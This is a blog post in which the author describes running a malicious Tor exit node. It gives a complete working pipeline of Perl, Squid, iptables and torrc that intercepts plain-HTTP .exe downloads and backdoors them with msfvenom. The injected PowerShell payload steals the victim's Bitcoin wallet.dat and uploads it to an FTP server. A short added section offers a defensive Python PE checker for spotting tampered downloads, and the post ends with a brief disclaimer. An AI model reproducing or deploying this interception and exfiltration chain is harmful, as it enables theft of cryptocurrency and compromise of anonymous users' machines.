From dirty Tor exit nodes to Bitcoin wallet.dat theft

Background

While living at a halfway house, and otherwise bored of being sober at the time, I decided I was going to run a Tor exit node. The neat thing about Tor exit nodes is that, as the operator, you handle any and all data that passes through your node, with the ability to packet-sniff it or even inject foreign code into unencrypted data streams.

How I did it

Some of this would need to be tweaked to your specific use case and server setup, but the basic idea is to take traffic leaving the Tor daemon for HTTP port 80 and reroute it to a Squid proxy that runs msfvenom on any .exe downloaded over the node, tagging the Windows PE executable with your own hot-patched binary. This means the .exe behaves the same for the user, but also runs your own code, say, on exit.

The perl code that does the actual patching:

#!/usr/bin/perl
$|++;
$count = 0;
$pid   = $$;
while (<>) {
    chomp $_;
    my @parts = split;
    my $url = $parts[0];
    if ( $url =~ /.*\.exe$/i ) {
        system( "/usr/bin/wget -q -O /var/www/html/patchit/a-$count.exe $url > /dev/null" );
        system(" ./msfvenom -k -x a-$count.exe -f exe --payload windows/exec --platform windows CMD=\"powershell -c $uploadFile=\"C:\%appdata%\Bitcoin\wallet.dat\";$rand = Get-Random -Maximum 10000;$linkFTP=\"ftp://user:pass@IP/wallet.$rand.dat\"; $client=New-Object -TypeName System.Net.WebClient; $URI=New-Object -TypeName System.Uri -ArgumentList $ftp; $client.UploadFile($URI,$uploadFile)\" -o f.exe -i 2 -e x86/shikata_ga_nai -a x86");
        # caveat: this only works right with x86 .exe's right now
        system(" chmod a+rw /var/www/html/patchit/*.exe");
        system("echo 'Patched: $url' >> /tmp/urls.log");
        print ( "http://127.0.0.1:80/f.exe\n" );
    }
    else {
        print "$url\n";
    }
    $count++;
}

The script is called by a Squid proxy with the following configuration:

visible_hostname 127.0.0.1
#acl local src 127.0.0.1
#http_access allow local
http_access allow all
#http_port 127.0.0.1:3128 intercept vhost allow-direct
http_port 3128 intercept
url_rewrite_program /tmp/frankenpatch.pl

Squid in turn comes into play when Tor attempts to connect to an .exe download page over HTTP. This is accomplished through some iptables rerouting magic: take note of the rule that catches traffic leaving the Tor daemon's uid 109 for destination port 80 and redirects it to our Squid proxy sitting on 127.0.0.1:3128:

# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*nat
:PREROUTING ACCEPT [17:908]
:POSTROUTING ACCEPT [379:22945]
:OUTPUT ACCEPT [197:12025]
-A OUTPUT -p tcp -m tcp --dport 80 -m owner --uid-owner 109 -j DNAT --to-destination 127.0.0.1:3128
COMMIT
# Completed on Sun Sep 22 17:39:18 2019
# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*mangle
:PREROUTING ACCEPT [20929:17905684]
:INPUT ACCEPT [20929:17905684]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [22075:17054611]
:POSTROUTING ACCEPT [22075:17054611]
COMMIT
# Completed on Sun Sep 22 17:39:18 2019
# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*filter
:INPUT ACCEPT [201:11864]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [22075:17054611]
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -m comment --comment "SSH Inbound" -j ACCEPT
-A INPUT -p tcp -m tcp --dport 9001 -m conntrack --ctstate NEW,ESTABLISHED -m comment --comment TOR -j ACCEPT
COMMIT
# Completed on Sun Sep 22 17:39:18 2019
# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*raw
:PREROUTING ACCEPT [20929:17905684]
:OUTPUT ACCEPT [22075:17054611]
COMMIT
# Completed on Sun Sep 22 17:39:18 2019

Concerning Tor itself, it's important to reject all traffic other than port 80, or you'll just run your bill up forwarding traffic that you can't patch. The torrc file below tells Tor how to start up:

ORPort 9001
Nickname [redacted]
ContactInfo oxagast oxagast@[redacted]
#ExitRelay 1
ExitPolicyRejectPrivate 0
ClientRejectInternalAddresses 0
ExitPolicy accept *:80,reject *:*
RelayBandwidthRate 180 KBytes

For good measure, I'm including my apache2 server config below:

DefaultRuntimeDir ${APACHE_RUN_DIR}
PidFile ${APACHE_PID_FILE}
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
HostnameLookups Off
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
Include ports.conf
<Directory />
        Options FollowSymLinks
        AllowOverride None
        Require all denied
</Directory>
<Directory /usr/share>
        AllowOverride None
        Require all granted
</Directory>
<Directory /var/www/html>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
</Directory>
AccessFileName .htaccess
<FilesMatch "^\.ht">
        Require all denied
</FilesMatch>
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
IncludeOptional conf-enabled/*.conf
IncludeOptional sites-enabled/*.conf

Now finally, the code that gets tagged onto the patchable executable:

./msfvenom -k -x a-4802.exe -f exe --payload windows/exec --platform windows CMD='$randn = Get-Random -Maximum 10000;$ftp = [System.Net.FtpWebRequest]::Create("ftp://example.com/wallets/wallet-$randn.dat");$ftp = [System.Net.FtpWebRequest]$ftp;$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;$ftp.Credentials = new-object System.Net.NetworkCredential("btc","keygoeshere");$ftp.UseBinary = $true;$ftp.UsePassive = $false;$ad = $env:APPDATA;$content = [System.IO.File]::ReadAllBytes("$ad\Bitcoin\wallets\wallet\wallet.dat");$ftp.ContentLength = $content.Length;$rs = $ftp.GetRequestStream();$rs.Write($content, 0, $content.Length);$rs.Close();$rs.Dispose();' -o f.exe -i 2 -e x86/shikata_ga_nai -a x86

This last bit of code uploads the user's Bitcoin wallet.dat to an FTP server of your choosing.
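Seen from the defender's side, the durable countermeasure to an exit node that rewrites plain-HTTP downloads is to refuse to run any executable that was not fetched over TLS and verified. The checker below is an added example written for this page, not code from the original post: it parses a PE header, flags the traits an injected payload stub tends to leave behind (entry point relocated into a trailing section, a section that is both writable and executable, no Authenticode signature) and compares the file against a hash published out-of-band; `build_pe` constructs a header-only sample image so the checks run offline, and its section names and layout are assumptions.

```python
import hashlib
import struct

# IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE: compilers rarely emit such a section, injected stubs often do.
RWX = 0x20000000 | 0x80000000

def inspect_pe(data):
    """Parse the PE headers and return the facts a reviewer wants before trusting a download."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)  # COFF header
    opt = pe + 24  # optional header follows the 20-byte COFF header
    magic, entry = struct.unpack_from("<H14xI", data, opt)  # Magic, AddressOfEntryPoint
    # Data directory 4 (IMAGE_DIRECTORY_ENTRY_SECURITY) describes the Authenticode blob, if any.
    dirs = opt + (112 if magic == 0x20B else 96)  # PE32+ vs PE32 layout
    sig_size = struct.unpack_from("<I", data, dirs + 4 * 8 + 4)[0]
    sections = []
    for i in range(nsect):
        name, vsize, rva, *_, chars = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(errors="replace"), rva, vsize, chars))
    entry_sec = next((s[0] for s in sections if s[1] <= entry < s[1] + s[2]), None)
    return {"entry_section": entry_sec,
            "entry_in_last_section": len(sections) > 1 and entry_sec == sections[-1][0],
            "rwx_sections": [s[0] for s in sections if (s[3] & RWX) == RWX],
            "has_authenticode": sig_size > 0}

def review_download(data, expected_sha256):
    """Return the reasons not to run this download; an empty list means every check passed."""
    reasons = []
    if hashlib.sha256(data).hexdigest() != expected_sha256.lower():
        reasons.append("sha256 does not match the hash published out-of-band by the vendor")
    info = inspect_pe(data)
    if info["entry_in_last_section"]:
        reasons.append("entry point is in the last section (%s), typical of an injected stub" % info["entry_section"])
    if info["rwx_sections"]:
        reasons.append("writable+executable section(s): " + ", ".join(info["rwx_sections"]))
    if not info["has_authenticode"]:
        reasons.append("no Authenticode signature present to verify")
    return reasons

def build_pe(sections, entry_rva):
    """Constructed sample input: header-only PE32 image with no code; sections = (name, rva, size, chars)."""
    dos = b"MZ" + bytes(58) + struct.pack("<I", 64)  # e_lfanew = 64, the PE signature follows at once
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)  # i386, 224-byte optional hdr
    opt = bytearray(224)
    struct.pack_into("<H14xI72xI", opt, 0, 0x10B, entry_rva, 16)  # PE32 magic, entry point, 16 data dirs
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), sz, rva, sz, 0, 0, 0, 0, 0, ch)
                     for n, rva, sz, ch in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table
```

An entry point in the last section or an RWX section is a heuristic, not proof; a matching vendor hash or a valid signature is what actually settles the question.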

What it looks like in action

This is particularly nasty code and I do not recommend running any of this on your own ever. It is most probably against some local and federal laws.

Be safe, and hope you enjoyed reading!

This post is licensed under CC BY 4.0 by the author.